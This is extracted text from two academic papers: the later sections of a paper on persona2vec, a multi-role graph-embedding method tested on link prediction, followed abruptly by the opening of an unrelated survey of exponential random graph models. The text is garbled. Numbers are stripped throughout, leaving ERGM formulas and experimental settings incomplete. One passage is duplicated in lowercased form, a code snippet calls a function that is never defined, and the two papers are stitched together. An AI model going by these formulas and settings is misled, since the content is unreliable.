Figure: case study on Zachary's karate club network. (A) The karate club network with a force-atlas layout (Zachary); nodes are colored by the communities detected with the Louvain modularity method (Blondel et al.). (B) The persona graph; nodes are colored by the k-means clusters (MacQueen) of the embedding vectors, coordinates of the persona nodes come from a two-dimensional t-SNE projection of the embedding (Maaten & Hinton), and light gray lines represent persona edges. (C) The network with a portion of its edges removed for the link prediction experiment. (D) The ten highest-scoring predictions from the link prediction experiment; blue links represent correctly predicted edges and red edges indicate incorrect ones.
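A quick way to reproduce the flavor of this case study is to run the ego-splitting sketch from above on the karate club graph that ships with networkx; the exact persona counts depend on the connected-component clustering assumption, so treat the printed numbers as illustrative.

import networkx as nx

G = nx.karate_club_graph()                       # 34 members, 78 ties
P, node2personas, _ = refined_ego_split(G, lam=0.5)

split_members = [v for v in G if len(node2personas[v]) > 1]
print(G.number_of_nodes(), P.number_of_nodes())  # original nodes vs. persona nodes
print(sorted(split_members))                     # members whose ego network has several clusters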
full-size doi: . /peerj-cs. /fig- yoon et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ multiple contexts of the word “newton”. for instance, the red persona is associated with “scientists” and “philosopher”, the gray one is linked to the physics, and the yellow one is associated with “apple” (note that there is a cookie called “(fig) newton” in the u.s.). furthermore, persona vec also captures different nuances of the word “law” that are related to the crime (brown cluster) and the legal concepts (orange cluster). numerical experiment link prediction task to systematically evaluate the performance and scalability of the persona vec framework, we perform a link prediction task using real-world graphs (grover & leskovec, ; abu-el-haija, perozzi & al-rfou, ). link prediction aims to predict missing edges in a graph with partial information, which is useful for many tasks such as suggesting new friends on social networks or recommending products. it has been employed as a primary task to evaluate the performance of unsupervised graph embedding methods (abu-el-haija, perozzi & al-rfou, ; zhang et al., ). we follow the task setup from the literature (grover & leskovec, ; abu-el-haija, perozzi & al-rfou, ). first, the edge set of an input graph is divided equally and randomly into etrain and etest. we then refine etest using a rejection sampling method based on the criterion that, even when we remove all edges in etest, the graph should be connected as a single component. etrain is used to train the models, and edges in etest are used as positive examples for the prediction task. second, a negative edge set e(−) of non-existent random edges with the same size of etest are generated to provide negative examples for testing. the performance of a model is measured by its ability to correctly distinguish etest and e(−) after being trained on etrain. we then report roc-auc. datasets to facilitate the comparison with the state-of-the-art baseline, we use five graph datasets that are publicly available and previously used (epasto & perozzi, ; leskovec & krevl, ). we summarize them as follows. ppi is a protein-protein interaction graph of homo sapiens (stark et al., ). nodes represent proteins and edges represent physical interactions between the proteins. ca-hepth is a scientific collaboration graph. it represents the co-authorship among researchers from the theoretical high energy physics field, derived from papers on arxiv. ca-astropph is also scientific collaboration graph, but from astrophysics. wiki-vote is a voting network, each node is a wikipedia user and a directed edge from node i to node j represents that user i voted for user j to become an administrator. soc-epinions is a voting graph from a general consumer review site epinions.com, each node is a member, and a directed edge from node i to node j means that member i trusted member j. we use the largest connected component of the undirected graphs and the largest weakly connected component of the directed ones. the statistics of all the graphs are reported in table . yoon et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://epinions.com http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ methods the state-of-the-art method in this link prediction task is splitter (epasto & perozzi, ), which also models multiple roles. 
Datasets

To facilitate the comparison with the state-of-the-art baseline, we use five publicly available graph datasets that have been used in previous work (Epasto & Perozzi; Leskovec & Krevl). PPI is a protein–protein interaction graph of Homo sapiens (Stark et al.); nodes represent proteins and edges represent physical interactions between them. ca-HepTh is a scientific collaboration graph representing co-authorship among researchers in theoretical high-energy physics, derived from papers on arXiv. ca-AstroPh is also a scientific collaboration graph, but from astrophysics. Wiki-Vote is a voting network: each node is a Wikipedia user, and a directed edge from node i to node j indicates that user i voted for user j to become an administrator. soc-Epinions is a trust graph from the general consumer review site Epinions.com: each node is a member, and a directed edge from node i to node j means that member i trusted member j. We use the largest connected component of the undirected graphs and the largest weakly connected component of the directed ones. The statistics of all the graphs are reported in Table 1.

Methods

The state-of-the-art method for this link prediction task is Splitter (Epasto & Perozzi), which also models multiple roles. As reported in that paper, it outperforms various existing algorithms, ranging from non-embedding methods such as the Jaccard coefficient, common neighbors, and Adamic–Adar to embedding methods such as Laplacian eigenmaps (Belkin & Niyogi), node2vec (Grover & Leskovec), DNGR (Cao, Lu & Xu), asymmetric projections (Abu-El-Haija, Perozzi & Al-Rfou), and M-NMF (Wang et al.). Given the state-of-the-art performance of Splitter, for simplicity we compare our framework with Splitter using the identical task setup and datasets. In addition, because our method can be considered an augmentation of a single-role embedding method, and because we use node2vec as the base embedding, we also include node2vec itself. We run the link prediction task with the original authors' implementations of node2vec and Splitter, keeping the parameters consistent with the original papers. persona2vec and Splitter produce multiple representations per node, which leads to non-unique similarity estimates between two nodes. We therefore define the similarity score of a pair of nodes in persona2vec as the maximum dot product of embedding vectors over all pairs of their personas. Among the three aggregation functions we tried (min, max, mean), the highest performance is achieved with max, the same as for Splitter (Epasto & Perozzi). For Splitter we use the maximum cosine similarity, following the authors' note in their implementation.

node2vec (baseline method)

For node2vec, we fix the random walk length t, the number of walks per node γ, the random walk parameters p = q, the window size w, and the initial learning rate α. The original paper additionally learns a logistic regression classifier over the Hadamard product of the embeddings of the two nodes for link prediction, which generally improves performance; we therefore report results for node2vec with both the plain dot product and the logistic regression classifier.

Splitter (baseline method)

For Splitter, we use the same parameters as in the original paper (Epasto & Perozzi) and the aforementioned node2vec baseline, with random walk parameters p = q.

persona2vec (our proposed method)

We set the hyper-parameters of the original-graph embedding (t_b, γ_b, w_b) and of the persona embedding (t_p, γ_p, w_p), choosing the latter so as to better capture the micro-structure of the persona graph. The size of the total walk corpus is determined by the random walk length t times the number of walks per node γ, so we keep the product tγ constant to roughly preserve the amount of information used in the embedding. For both embedding stages we use the same learning rate α and node2vec with the random walk parameters (p = q) as the graph embedding function.
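The pair-scoring rule described above (maximum dot product over all persona pairs) reduces to a few lines of NumPy; the sketch assumes persona embeddings stored per original node, with hypothetical toy vectors for illustration.

import numpy as np

def pair_score(personas_u, personas_v):
    # personas_u, personas_v: arrays of shape (n_personas, d) for the two nodes.
    # Score = max over all persona pairs of the dot product of their vectors.
    return float(np.max(personas_u @ personas_v.T))

emb = {  # hypothetical persona embeddings: two personas for u, one for v
    "u": np.array([[0.9, 0.1], [-0.2, 0.8]]),
    "v": np.array([[0.7, 0.3]]),
}
print(pair_score(emb["u"], emb["v"]))

For Splitter the same max-aggregation is applied to cosine similarities instead of dot products.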
Experiment results

The figure below shows the link prediction performance of persona2vec in comparison with the baselines. Overall, persona2vec yields superior performance across graphs and across a range of hyperparameter choices. Augmenting node2vec with personas significantly improves the link prediction performance, as evidenced by the large performance gain (see Table 2). As expected, larger dimensions lead to better performance, although persona2vec achieves reasonable results even with tiny embedding dimensions. We also examine how the performance of persona2vec varies with λ. For undirected graphs, a larger λ is beneficial, but the trend saturates quickly; for directed graphs, optimal performance is achieved with smaller values of λ. In practice we suggest a small default value of λ, because the overall variation brought by λ is not substantial, and even when the performance increases with λ, near-optimal performance is already reached at the default. When compared with the Splitter baseline, persona2vec is on par or better given the same embedding dimensions, across a wide range of λ.

Figure: performance of persona2vec in the link prediction task on (A) PPI, (B) ca-HepTh, (C) ca-AstroPh, (D) Wiki-Vote, and (E) soc-Epinions. The number of epochs is fixed for persona2vec in all experiments, darker colors represent higher embedding dimensions, and the confidence intervals lie within the range of the markers. Given the same number of dimensions, persona2vec is always on par with or better than Splitter.

Table 2: link prediction performance (ROC-AUC) of persona2vec with the suggested default λ, compared with the baselines on PPI, ca-HepTh, ca-AstroPh, Wiki-Vote, and soc-Epinions, all with the same embedding dimension d. node2vec* denotes node2vec with the logistic regression classifier, Splitter* denotes Splitter trained for one epoch, and persona2vec* denotes persona2vec with the suggested default λ; the performance-gain row is the difference between persona2vec* and node2vec. Standard errors below the reported precision are omitted, and the best value per dataset is shown in bold.

We report the performance summary for persona2vec with the suggested default λ against the best baselines in Table 2, which shows that persona2vec outperforms the baselines consistently. We also report the performance gain of persona2vec over node2vec: because node2vec is our base embedding method, persona2vec can be considered an augmentation or fine-tuning of the base node2vec vectors with local structural information, and this persona-based fine-tuning significantly improves the performance. We additionally study the effect of the two optimization methods, hierarchical softmax and negative sampling (see the comparison figure below). Cosine similarity consistently yields better results with hierarchical softmax, while the dot product works better with negative sampling, regardless of the embedding method; we therefore use cosine similarity for hierarchical softmax and the dot product for negative sampling. Our experiments suggest that persona2vec tends to perform better with negative sampling while Splitter works better with hierarchical softmax; nevertheless, persona2vec yields the best performance consistently. In addition to link prediction performance, we also report the execution time of persona2vec and Splitter to compare their scalability in practice. The reported execution time is from the link-prediction task, with half of the edges removed from the original graph. Splitter runs the embedding procedure for several epochs by default in the original implementation, whereas persona2vec runs for only one epoch.
For a fair comparison, we also report the results of Splitter with one epoch of training. When limited to a single epoch, Splitter's performance suffers slightly on three graphs, while it improves or stays stable on the other two.

Figure: comparison of link prediction performance between persona2vec and Splitter under the different approximations, for (A) PPI, (B) ca-HepTh, (C) ca-AstroPh, (D) Wiki-Vote, and (E) soc-Epinions. HS refers to hierarchical softmax and NS to negative sampling; the star marker indicates the best link prediction performance.

Nevertheless, persona2vec is considerably more efficient: it is many times faster than Splitter with its default number of epochs and roughly five to eight times faster than Splitter restricted to one epoch. The most likely reason for this drastic difference is the overhead of the extra regularization term in Splitter's cost function, which persona2vec does not need. In sum, persona2vec outperforms the previous state-of-the-art method in terms of both scalability and link prediction performance.

Conclusions

We present persona2vec, a framework for learning multiple node representations that takes a node's local structural contexts into account. persona2vec first performs ego-splitting, in which nodes whose ego-networks contain multiple non-overlapping local communities are replaced with corresponding persona nodes. The persona nodes inherit the edges from the original graph and remain connected through newly added persona edges, forming the persona graph. Initialized with the embedding of the original graph, the embedding algorithm applied to the persona graph yields the final representations. Instead of assigning only one vector to a node with multiple roles, persona2vec learns a vector for each of its personas. With extensive link prediction evaluations, we demonstrate that persona2vec achieves state-of-the-art performance while scaling better. Moreover, our method is easy to understand and implement without losing any flexibility for incorporating other embedding algorithms, presenting great potential for applications.

Figure: comparison of elapsed time between persona2vec and Splitter; the speed-ups obtained by persona2vec are shown.

The possible combination with various algorithms provides a vast space for further exploration. For instance, in a multi-layer network, inter-layer coupling connections can be interpreted as natural persona edges, and persona2vec may be applied to tackle the multi-layer link prediction problem. The graph (relational) structure is ubiquitous across many complex systems, including physical, social, economic, biological, neural, and information systems, and thus fundamental graph algorithms have far-reaching impacts across many areas of science. Graph embedding, in particular, removes the barrier of translating methods to the special graph data structure, opening up a powerful way to transfer existing algorithms to graphs and relational data.
Furthermore, given that it is natural to assume that overlapping clusters and their heterogeneous functionality exist in most real networks, multi-role embedding methods may find numerous applications in the physical, biological, and social sciences.

Acknowledgements

For their comments, we thank Sadamori Kojaku, Alessandro Flammini, Filippo Menczer, Xiaoran Yan, Filipi Nascimento Silva, and Minwoo Ahn.

Additional Information and Declarations

Funding: This work is supported by the Air Force Office of Scientific Research. The funders had no role in study design, data collection and analysis, the decision to publish, or preparation of the manuscript.

Grant disclosures: The following grant information was disclosed by the authors: Air Force Office of Scientific Research.

Competing interests: The authors declare that they have no competing interests.

Author contributions: Jisung Yoon conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Kai-Cheng Yang, Woo-Sung Jung, and Yong-Yeol Ahn conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft.

Data availability: The preprocessed version of PPI is available at Stanford University: https://snap.stanford.edu/node2vec/. The other graphs (ca-AstroPh, ca-HepTh, Wiki-Vote, soc-Epinions) are available in the SNAP library: http://snap.stanford.edu/data/index.html. Code is available at GitHub: https://github.com/jisungyoon/persona2vec.

References

Abu-El-Haija S, Perozzi B, Al-Rfou R. Learning edge representations via low-rank asymmetric projections. In: Proceedings of the ACM Conference on Information and Knowledge Management (CIKM). New York: ACM.
Ahn Y-Y, Bagrow JP, Lehmann S. Link communities reveal multiscale complexity in networks. Nature.
Airoldi EM, Blei DM, Fienberg SE, Xing EP. Mixed membership stochastic blockmodels. Journal of Machine Learning Research.
Belkin M, Niyogi P. Laplacian eigenmaps and spectral techniques for embedding and clustering. In: Proceedings of the International Conference on Neural Information Processing Systems. Cambridge: MIT Press.
Blondel VD, Guillaume J-L, Lambiotte R, Lefebvre E. Fast unfolding of communities in large networks. Journal of Statistical Mechanics: Theory and Experiment.
Camacho-Collados J, Pilehvar MT, Navigli R. NASARI: integrating explicit knowledge and corpus statistics for a multilingual representation of concepts and entities. Artificial Intelligence.
Cao S, Lu W, Xu Q. Deep neural networks for learning graph representations. In: Proceedings of the Thirtieth AAAI Conference on Artificial Intelligence. AAAI Press.
Chen H, Perozzi B, Hu Y, Skiena S. HARP: hierarchical representation learning for networks. In: Thirty-Second AAAI Conference on Artificial Intelligence. New Orleans: AAAI Press.
Chen X, Liu Z, Sun M. A unified model for word sense representation and disambiguation. In: Proceedings of the Conference on Empirical Methods in Natural Language Processing (EMNLP). Association for Computational Linguistics.
Cheng J, Wang Z, Wen J-R, Yan J, Chen Z. Contextual text understanding in distributional semantic space. In: Proceedings of the ACM International Conference on Information and Knowledge Management. ACM.
Coscia M, Rossetti G, Giannotti F, Pedreschi D. Uncovering hierarchical and overlapping communities with a local-first approach. ACM Transactions on Knowledge Discovery from Data.
Epasto A, Lattanzi S, Mirrokni V, Sebe IO, Taei A, Verma S. Ego-net community mining applied to friend suggestion. Proceedings of the VLDB Endowment.
Epasto A, Lattanzi S, Paes Leme R. Ego-splitting framework: from non-overlapping to overlapping clusters. In: Proceedings of the ACM SIGKDD International Conference on Knowledge Discovery and Data Mining (KDD). New York: ACM.
Epasto A, Perozzi B. Is a single embedding enough? Learning node representations that capture multiple social contexts. In: The World Wide Web Conference. New York: ACM.
Evans TS, Lambiotte R. Line graphs, link partitions, and overlapping communities. Physical Review E.
Fortunato S. Community detection in graphs. Physics Reports.
Gavin A-C, Aloy P, Grandi P, Krause R, Boesche M, Marzioch M, Rau C, Jensen LJ, Bastuck S, Dümpelfeld B, et al. Proteome survey reveals modularity of the yeast cell machinery. Nature.
Grover A, Leskovec J. node2vec: scalable feature learning for networks. In: Proceedings of the ACM SIGKDD International Conference on Knowledge Discovery and Data Mining (KDD). New York: ACM.
Iacobacci I, Pilehvar MT, Navigli R. SensEmbed: learning sense embeddings for word and relational similarity. In: Proceedings of the Annual Meeting of the Association for Computational Linguistics and the International Joint Conference on Natural Language Processing. Association for Computational Linguistics.
Jauhar SK, Dyer C, Hovy E. Ontologically grounded multi-sense representation learning for semantic vector space models. In: Proceedings of the Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies. Association for Computational Linguistics.
Leskovec J, Krevl A. SNAP datasets: Stanford large network dataset collection. Available at http://snap.stanford.edu/data.
Leskovec J, Lang KJ, Dasgupta A, Mahoney MW. Community structure in large networks: natural cluster sizes and the absence of large well-defined clusters. Internet Mathematics.
Leskovec J, Lang KJ, Mahoney M. Empirical comparison of algorithms for network community detection. In: Proceedings of the International Conference on World Wide Web (WWW). New York: ACM.
Li J, Jurafsky D. Do multi-sense embeddings improve natural language understanding? arXiv preprint.
Liu N, Tan Q, Li Y, Yang H, Zhou J, Hu X. Is a single vector enough? Exploring node polysemy for network embedding. In: Proceedings of the ACM SIGKDD International Conference on Knowledge Discovery & Data Mining. New York: Association for Computing Machinery.
Liu P, Qiu X, Huang X. Learning context-sensitive word embeddings with neural tensor skip-gram model. In: International Joint Conference on Artificial Intelligence (IJCAI). Palo Alto: AAAI Press.
Liu Y, Liu Z, Chua T-S, Sun M. Topical word embeddings. In: AAAI Conference on Artificial Intelligence, Austin, Texas, USA.
Maaten L van der, Hinton G. Visualizing data using t-SNE. Journal of Machine Learning Research.
MacQueen J. Some methods for classification and analysis of multivariate observations. In: Proceedings of the Fifth Berkeley Symposium on Mathematical Statistics and Probability, Oakland, CA, USA.
McInnes L, Healy J, Melville J. UMAP: uniform manifold approximation and projection for dimension reduction. arXiv preprint.
Mikolov T, Chen K, Corrado G, Dean J. Efficient estimation of word representations in vector space. arXiv preprint.
Mikolov T, Sutskever I, Chen K, Corrado GS, Dean J. Distributed representations of words and phrases and their compositionality. In: Advances in Neural Information Processing Systems.
Morin F, Bengio Y. Hierarchical probabilistic neural network language model. In: Artificial Intelligence and Statistics (AISTATS).
Neelakantan A, Shankar J, Passos A, McCallum A. Efficient non-parametric estimation of multiple embeddings per word in vector space. arXiv preprint.
Palla G, Derényi I, Farkas I, Vicsek T. Uncovering the overlapping community structure of complex networks in nature and society. Nature.
Pelevina M, Arefyev N, Biemann C, Panchenko A. Making sense of word embeddings. arXiv preprint.
Pennington J, Socher R, Manning C. GloVe: global vectors for word representation. In: Proceedings of the Conference on Empirical Methods in Natural Language Processing (EMNLP).
Perozzi B, Al-Rfou R, Skiena S. DeepWalk: online learning of social representations. In: Proceedings of the ACM SIGKDD International Conference on Knowledge Discovery and Data Mining (KDD). New York: ACM.
Raghavan UN, Albert R, Kumara S. Near linear time algorithm to detect community structures in large-scale networks. Physical Review E.
Reisinger J, Mooney RJ. Multi-prototype vector-space models of word meaning. In: Human Language Technologies: Conference of the North American Chapter of the Association for Computational Linguistics. Association for Computational Linguistics.
Rossi RA, Ahmed NK. The network data repository with interactive graph analytics and visualization. In: AAAI Conference on Artificial Intelligence.
Rosvall M, Bergstrom CT. Maps of random walks on complex networks reveal community structure. Proceedings of the National Academy of Sciences of the United States of America.
Rosvall M, Esquivel AV, Lancichinetti A, West JD, Lambiotte R. Memory in network flows and its effects on spreading dynamics and community detection. Nature Communications.
Rothe S, Schütze H. AutoExtend: extending word embeddings to embeddings for synsets and lexemes. arXiv preprint.
Sen P, Namata G, Bilgic M, Getoor L, Galligher B, Eliassi-Rad T. Collective classification in network data. AI Magazine.
Stark C, Breitkreutz B-J, Reguly T, Boucher L, Breitkreutz A, Tyers M. BioGRID: a general repository for interaction datasets. Nucleic Acids Research.
Tang J, Qu M, Wang M, Zhang M, Yan J, Mei Q. LINE: large-scale information network embedding. In: Proceedings of the International Conference on World Wide Web (WWW). International World Wide Web Conferences Steering Committee.
Wang X, Cui P, Wang J, Pei J, Zhu W, Yang S. Community preserving network embedding. In: Thirty-First AAAI Conference on Artificial Intelligence.
Wu Z, Giles CL. Sense-aware semantic analysis: a multi-prototype word representation model using Wikipedia. In: Twenty-Ninth AAAI Conference on Artificial Intelligence.
Xie G-S, Liu L, Zhu F, Zhao F, Zhang Z, Yao Y, Qin J, Shao L. Region graph embedding network for zero-shot learning. In: European Conference on Computer Vision. Cham: Springer.
Yang L, Cao X, He D, Wang C, Wang X, Zhang W. Modularity based community detection with deep learning. In: International Joint Conference on Artificial Intelligence (IJCAI). AAAI Press.
Zachary WW. An information flow model for conflict and fission in small groups. Journal of Anthropological Research.
Zhang H, Zhong G. Improving short text classification by learning vector representations of both words and hidden topics. Knowledge-Based Systems.
Zhang Z, Cui P, Wang X, Pei J, Yao X, Zhu W. Arbitrary-order proximity preserved network embedding. In: Proceedings of the ACM SIGKDD International Conference on Knowledge Discovery & Data Mining. New York: ACM.
A survey on exponential random graph models: an application perspective

Saeid Ghafouri and Seyed Hossein Khasteh, School of Computer Engineering, K. N. Toosi University of Technology, Tehran, Iran. Corresponding author: Seyed Hossein Khasteh, khasteh@kntu.ac.ir. Academic editor: Yilun Shang. Copyright Ghafouri and Khasteh; distributed under a Creative Commons CC-BY license (open access).

Abstract

The uncertainty underlying real-world phenomena has attracted attention toward statistical analysis approaches. In this regard, many problems can be modeled as networks, and the statistical analysis of networked problems has therefore received special attention from many researchers in recent years. Exponential random graph models, known as ERGMs, are one of the popular statistical methods for analyzing the graphs of networked data. An ERGM is a generative statistical network model whose ultimate goal is to present a subset of networks with particular characteristics as a statistical distribution. In the context of ERGMs, these graph characteristics are called statistics or configurations; most of the time they are counts of repeated subgraphs, such as the number of triangles or the number of cycles of an arbitrary length, although any other census of the graph, such as the edge density, can also serve as a statistic. In this review paper, after explaining the building blocks and classic methods of ERGMs, we review their newly presented approaches and research papers. Further, we conduct a comprehensive study of the applications of ERGMs in many research areas, which, to the best of our knowledge, has not been done before. This review can serve as an introduction for scientists from various disciplines whose aim is to use ERGMs on networked data in their field of expertise.

Subjects: Artificial Intelligence, Computer Networks and Communications, Data Mining and Machine Learning, Network Science and Online Social Networks, Social Computing
Keywords: exponential random graph models survey, exponential random graphs, ERGM, ERGMs' survey, ERGMs' applications

Introduction

Networks are an essential part of everyday life: from the World Wide Web to biological networks, they shape the connections of the world. Examples of networks appear in many fields and disciplines, including social networks, traffic systems, and disease-spread networks. The most canonical way of representing a network is a graph. However, not all of a network's ties are present with complete certainty. For example, in a friendship network, the level of friendship is not the same among all individuals, and there is always a chance that two friends end their friendship in the future. Further, in some domains the current snapshot of the network depends on its timestamp: the network's shape might be different if the snapshot had been taken at another time. For example, in a blockchain network the structure of the connections is constantly changing, so the graph has a dynamic structure over time.
All of this suggests some level of uncertainty in many real-world networks; therefore, simple graph theory will not suffice for examining them. These limitations have led to entirely new statistical approaches to graph analysis. More specifically, we want to build a statistical model based on an observed dataset. In this type of graph analysis, a probability in the interval [0, 1] is assigned to each graph. A probability close to zero indicates that the graph has essentially no chance of existence, while a value of one suggests that this particular graph will undoubtedly exist in the generated data; any other value between zero and one indicates the existence probability of that graph. These probabilities have different meanings depending on the domain of the network, but the probability of a graph's existence is the most fundamental interpretation, to which we will stick for the rest of the article.

Statistical graphs (Frank; Robins et al.; Goldenberg et al.) have attracted scientists from different disciplines, and different approaches exist regarding their formulation and learning methods. Researchers from mathematics, computer science, physics, and of course statistics have proposed different algorithms and methods for designing frameworks for statistically modeled graphs. In addition, statistical graphs are fundamental to generative models that produce new graphs with statistics and attributes similar to the original graphs. Such artificially generated models have various applications, e.g., data augmentation for learning systems when the available datasets are limited, or simulating and predicting other possible graphs with similar properties. Furthermore, there are longitudinal models (Holland & Leinhardt; Koskinen & Snijders; de la Haye et al.; Block et al.) which aim to observe a network over a period of time and predict the network's future dynamics. Although different approaches exist, in this work we review research articles about a particular family of statistical graphs known as exponential random graph models, abbreviated as ERGMs.

Designing a statistical model consists of three steps: (1) designing a general formulation based on the context and statistical specification of the dataset; (2) estimating the parameters of the designed model via some learning method, a step sometimes referred to as fitting the model to the data; and (3) employing the model with the learned parameters to predict the future or unseen part of the data, to generate new data with similar properties, or for any other possible task. A flowchart of these steps is given in the Supplemental Figures. The model formulation used for ERGMs (step 1) is almost identical across the literature; the parameter estimation step (step 2), however, differs case by case.

The focus of seminal works such as Erdős & Rényi was mostly on independent tie formation between two nodes. In ERGMs, more complex structures with a reasonable level of dependence are also taken into account. This approach has led to more complicated models, which in turn require more sophisticated learning methods. Additionally, owing to the better accuracy of models with dependent structures, they are applicable to a considerably wider range of problems; therefore, there is rising interest in using ERGMs in multiple research areas.
Previous surveys (Anderson, Wasserman & Crouch; Pattison & Wasserman; Robins, Pattison & Wasserman; Goodreau; Robins et al.; Fienberg; Goldenberg et al.; Chatterjee & Diaconis; Chatterjee) have introduced most of the articles published up to their time, and two more recent surveys (Amati, Lomi & Mira; van der Pol) focus on the theory and applications of ERGMs. However, there is a relative paucity of studies investigating ERGMs' seminal and new methods together and, to the best of our knowledge, no research has examined applications of ERGMs across different fields and contexts in the way that we have done. We believe that this review can help scholars of different disciplines to recognize the recent applications of ERGMs in their specific fields of interest; certainly, there is still room for further applications of ERGMs in fields that are yet to be explored. There are also other generative models for network generation, such as neural-network based graph generation (Bojchevski et al.; You et al.) and stochastic actor-oriented models (Snijders); however, to the best of our knowledge, ERGMs are among the oldest methods that have been extensively used in the literature up to now.

Several statistical learning methods have been used for ERGM parameter learning. In this article, we address the following:
• importance sampling
• stochastic approximation
• some of the newly presented methods.

We introduce applications of random graphs in the following categories:
• medical imaging
• healthcare applications
• economics and management
• political science
• missing data and link prediction
• scientific collaboration
• wireless network modelling
• other applications.

Also, some useful tools and libraries for the estimation of ERGMs are introduced:
• PNet
• the R package statnet
• Bergm.

'Survey methodology' briefly describes the methodology we used to find the articles that we believe are related to the topic of this manuscript. In 'Precise definition of ERGMs' we give a formal definition of ERGMs for readers who are new to the concept; for experienced researchers in the field, it can serve as a refresher. In 'Methods for estimation', most of the state-of-the-art work on ERGM estimation methods is discussed. 'Preliminaries' reviews ERGMs' applications in multiple fields, and in 'Applications of ERGMs' we introduce some of the state-of-the-art libraries and tools for ERGM estimation. Ultimately, in the conclusion we summarize the survey and give some ideas for future work in the world of ERGMs.

Survey methodology

For the purpose of finding related research articles we used two different approaches:
1. searching related keywords in the Google Scholar search engine;
2. starting from an initial pool of articles and then moving back and forth between their citations and references.

In the first approach, we searched related keywords such as "ERGM", "exponential random graphs", and "exponential random graph models" in the Google Scholar search engine and extracted related articles by reading their abstracts.
In the second approach, which was our main methodology throughout this work, we started from a number of seminal works found in one of the following ways:
1. being introduced by experts in the field;
2. being listed in the well-known surveys (Anderson, Wasserman & Crouch; Robins, Pattison & Wasserman; Pattison & Wasserman; Goodreau; Robins et al.; Fienberg; Goldenberg et al.; Chatterjee & Diaconis; Chatterjee; Amati, Lomi & Mira; van der Pol) and the well-known book by Lusher, Koskinen & Robins;
3. being papers found through the first approach that had a good citation count or were published in journals with high impact.

After finding this initial seed of articles, we checked the publications they referenced and the publications that cited them, and continued until there were no more related articles. In situations where there were too many related articles, our selection criteria were based mostly on citation counts and the journals' impact factors.

Precise definition of ERGMs

In this section, we give a brief overview of the overall ERGM scheme. According to Snijders et al. and Robins et al., the first work that established ERGMs as a separate field of study was Frank & Strauss; although the models were called Markov graphs at that time, they had essentially the same characteristics. An interested reader can refer to Robins et al. and Lusher, Koskinen & Robins for more details on both the history and the mathematical background of this topic.

In an ERGM, each graph is associated with a probability, which indicates the chance of that particular graph appearing in the probability distribution of a class of graphs. There are two other essential elements in ERGMs, namely the graph configurations and their corresponding parameters. Each configuration, or statistic (we use both names throughout the text), is composed of a set of nodes and ties repeated in the graph; for example, a triangle consisting of three nodes and three edges can be taken as a configuration. The authors of the seminal work of Frank & Strauss were the first who
this formula is a variation of logistic regression which is extended so that it would handle the dependent variable rather than only being applicable to independent variables which are the case for logistic regression (lusher, koskinen & robins, ). we will use the notations presented in table throughout our work. note that throughout this work, the representation of the graphs is in the form of the adjacency matrix. for example, in a matrix x if xij = it indicates that there is an edge between i and j, while if xij = no edge exists between these two nodes. using the introduced notation of table , the ergm probability function can be expressed as follows: p(x =x|θ)= n exp { θ c (x)+θ c (x)+...+θpcp(x) } ( ) n is the normalizing factor which is the sum of the probability of all possible graphs computed by eq. ( ), whose formula is as follows: n = ∑ x∈x exp { θ c (x)+θ c (x)+...+θpcp(x) } ( ) if we summarize the results, this leads to: p(x =x|θ)= n exp { θ t c(x) } ( ) n = ∑ x∈x expθt c(x) ( ) ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. it can be seen in the eq. ( ) that the network configurations are the building blocks of the ergm formulation. choosing the correct configurations with the right relation to the network context is central for to the correct estimation of the graphs’ distribution. there are two types of network statistics: ( ) statistics based on the edge formations, ( ) statistics that are based on the node attributes. in the rest of this section, we are going to introduce some basic network configurations (snijders et al., ; robins et al., a) which have been used in the literature. structural configuration refers to the statistics that depend solely on the structure of the graph. note that their usage is not dependent on the network context and can be applied to any networks. these structures are different in undirected and directed networks. some structural configurations that are widely used for undirected and directed graphs are presented in (tables s and s ), respectively. although use of nodal configurations in our model will cause to be more dependent on some specific context, sometimes it is still useful to leverage this kind of network attributes. the reason is that, in many networks, there is a treasure of useful features in the node’s metadata and it is not wise to ignore them as one of our model features. some descriptions of nodal configurations that are widely used for undirected and directed graphs are reported in (tables s and s ), respectively. according to morris, handcock & hunter ( ), there should not be a linear dependence between the configurations that are used in a model. it is due to that fact that the configurations with linear interdependence with each other cannot add any new benefit to the model and only make the model more complicated. snijders et al. ( ) gave a generalization of ergms and also introduced some new configurations. since then, it has been extensively used in other works. here we present a brief description of each of them. geometrically weighted degree counts (gwdc): this measure is an extension of the nodes’ degree combined with geometrically degree discounts in the computation of the statistics, which is expressed as the following expression: gwdc(x)= n− ∑ k= e−αkdk(x) ( ) in this equation, x is the matrix we want to compute its corresponding gwdc value and n is the number of nodes in the graph. dk represents the number of nodes with degree k. 
geometrically weighted star counts (gwsc): this measure is an extension of the star counts combined with geometric degree discounts in the computation of the statistic, expressed as:

$$\mathrm{GWSC}(x) = \sum_{k=2}^{n-1} (-1)^{k}\, \frac{s_k}{\lambda^{\,k-2}} \qquad (\ )$$

in this equation, s_k is the number of stars with k edges (k-stars), and λ denotes a decaying factor that geometrically discounts stars of higher order.

sum of ascending factorial degrees (safd): first presented in handcock & jones ( ), this is a variation of the yule distribution using the sum of ascending factorials of the degrees:

$$\mathrm{SAFD}(x) = \sum_{i=1}^{n} (y_{i+} + c)_r \qquad (\ )$$

where (d)_r = d(d+1)\cdots(d+r-1) denotes the ascending factorial and y_{i+} is the degree of node i.

transitivity by altering k-triangles (tat): this measure is an extension of the triangle counts combined with geometric discounts in the computation of the statistic, expressed as:

$$\mathrm{TAT}(x) = t_1 - \frac{t_2}{\lambda} + \frac{t_3}{\lambda^{2}} - \dots + (-1)^{\,n-3}\, \frac{t_{n-2}}{\lambda^{\,n-3}} \qquad (\ )$$

in this equation, t_k is the number of k-triangles, and λ is a decaying factor that geometrically discounts higher-order k-triangles. figure s displays a description of k-triangles.

altering independent two-paths (ai2p): this measure is an extension of the two-path counts combined with geometric discounts in the computation of the statistic, expressed as:

$$\mathrm{AI2P}(x) = u_1 - \frac{2}{\lambda}\, u_2 + \sum_{k=3}^{n-2} \left(-\frac{1}{\lambda}\right)^{k-1} u_k \qquad (\ )$$

